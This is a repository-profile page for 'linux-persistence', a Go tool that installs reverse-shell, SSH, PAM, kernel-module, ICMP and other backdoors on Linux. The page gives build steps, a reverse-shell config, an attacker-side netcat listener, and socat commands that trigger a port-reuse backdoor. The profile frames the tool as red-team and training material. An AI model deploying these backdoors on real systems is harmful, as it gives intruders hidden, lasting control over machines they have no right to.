linux-persistence: A Go-based Linux Persistence Tool for Security Research

This repository profile is provided by osrepos.com, an open source repository discovery platform.

linux-persistence: A Go-based Linux Persistence Tool for Security Research

Summary

linux-persistence is a comprehensive Linux persistence tool written in Go, designed exclusively for security research and authorized penetration testing. It offers a wide array of techniques to maintain access on Linux systems, making it a valuable resource for red team exercises and security awareness training.

Repository Information

Analyzed by OSRepos on October 11, 2025

Topics

Click on any tag to explore related repositories

Use at your own risk

OSRepos shares public repositories for knowledge and discovery only. Any installation, execution, configuration, or use of code from these repositories is the user's own responsibility. Always review the repository, source code, dependencies, licenses, and security implications before running or installing anything. OSRepos is not responsible for issues, damages, or losses resulting from third-party repositories.

Introduction

linux-persistence is a robust Linux persistence tool, meticulously crafted in Go. It provides a comprehensive suite of techniques designed to maintain unauthorized access on Linux systems. This tool is intended solely for authorized security research, penetration testing, red team exercises, and security awareness training. Users are strongly advised to adhere to ethical guidelines and local laws, as misuse can lead to severe consequences.

The repository showcases a wide array of persistence methods, including reverse shells, SSH backdoors, hidden files, cron backdoors, Setuid backdoors, PAM backdoors, kernel module backdoors, ICMP backdoors, DNS backdoors, VIM backdoors, Strace backdoors, and port reuse backdoors. Each technique offers a unique approach to achieving and maintaining system access.

Installation

To get linux-persistence up and running, you'll need to compile it from source. Ensure you have the necessary dependencies installed on your Linux system, including a GCC compiler, Linux kernel development headers, PAM development library, iptables, and netcat or socat.

First, clone the repository:

git clone https://github.com/Maikefee/linux-persistence.git
cd linux-persistence

Then, compile the tool:

go build -o linux-persistence main.go

Examples

For optimal results, it is recommended to run linux-persistence with root privileges.

Basic Usage:

sudo ./linux-persistence

Configuration Options:
You can customize various settings by modifying the config struct in main.go before compilation:

var config = Config{
    ReverseShellHost: "192.168.1.100",  // Reverse shell target host
    ReverseShellPort: 4444,             // Reverse shell target port
    BackdoorPort:     6666,             // VIM backdoor listening port
    HiddenProcess:    "systemd-resolved", // Hidden process name
    SSHBackdoorPort:  2222,             // SSH backdoor port
}

Using the Reverse Shell:

  1. Prepare Listener: On your attacker machine, start a netcat listener:
    nc -lvp 4444
    
  2. Run Tool: On the target machine, execute the tool (it will attempt to connect to the configured ReverseShellHost:ReverseShellPort):
    sudo ./linux-persistence
    

Using the SSH Backdoor:
After running the tool on the target, you can connect via SSH:

ssh -p 2222 root@target_ip

Port Reuse:
Activate port reuse by sending a specific string:

echo 'backdoor' | socat - tcp:target_ip:80

Deactivate port reuse:

echo 'close' | socat - tcp:target_ip:80

ICMP Backdoor:
The ICMP backdoor is triggered by sending an ICMP packet containing the string "backdoor".

Why Use linux-persistence?

linux-persistence stands out as a valuable resource for anyone involved in offensive security, security research, or defensive training. Its implementation in Go ensures efficiency and a relatively small footprint. The tool's strength lies in its comprehensive collection of diverse persistence techniques, offering practical insights into how adversaries maintain access on Linux systems.

For security professionals, it serves as an excellent educational platform to understand, simulate, and ultimately develop robust detection and protection strategies against various persistence mechanisms. The README also provides valuable information on detection methods (e.g., netstat -an, ps aux, crontab -l, lsmod) and protection recommendations (e.g., regular integrity checks, HIDS/NIDS deployment, restricting root privileges), making it useful for both red and blue teams.

Links

Related repositories

Similar repositories that may be relevant next.

no-mistakes: AI-Driven Git Proxy for Flawless Pull Requests

no-mistakes: AI-Driven Git Proxy for Flawless Pull Requests

June 30, 2026

no-mistakes is an innovative Git proxy that streamlines the pull request workflow by ensuring code quality before it reaches your remote. It uses an AI-driven validation pipeline in a disposable worktree, automatically applying safe fixes and escalating complex issues for human review. This tool helps developers maintain clean, high-quality codebases and open perfect PRs effortlessly.

GitAIDeveloper Tools
Gogcli: Google Workspace Management from Your Terminal

Gogcli: Google Workspace Management from Your Terminal

June 24, 2026

Gogcli is a powerful command-line interface for Google Workspace, allowing users to manage Gmail, Calendar, Drive, Docs, Sheets, and many other services directly from their terminal. It is designed for both interactive use and robust automation, providing predictable output, agent safety features, and support for multiple accounts.

gcalgcontactsgdrive
PinchTab: High-Performance Browser Automation for AI Agents

PinchTab: High-Performance Browser Automation for AI Agents

June 21, 2026

PinchTab is a high-performance browser automation bridge and multi-instance orchestrator, designed to give AI agents direct control over Chrome. Built in Go, it offers advanced stealth injection, real-time dashboards, and token-efficient web interaction. It supports both headless and headed modes, enabling robust and secure automation workflows for various applications.

browser-automationGoheadless-chrome
Multigres: Vitess Adaptation for Scalable Postgres Databases

Multigres: Vitess Adaptation for Scalable Postgres Databases

June 3, 2026

Multigres is an innovative project that adapts Vitess for use with PostgreSQL, aiming to bring advanced sharding and scalability features to Postgres environments. Currently in early development, it offers a promising solution for managing large-scale Postgres deployments. Users can explore its capabilities and contribute to its growth.

GoPostgresVitess

Source repository

Open the original repository on GitHub.

7 counted GitHub visits

View on GitHub
OS
OSRepos

Analysis and discovery of open source repositories. Find interesting projects and follow their updates.

Monitor your website with YourWebsiteScore

OSRepos shares public repositories for knowledge and discovery only. Any installation, execution, configuration, or use of third-party repository code is at your own risk. Always review source code, dependencies, licenses, and security implications before running anything.

© 2025 OSRepos. Built with Nuxt 3 and lots of ❤️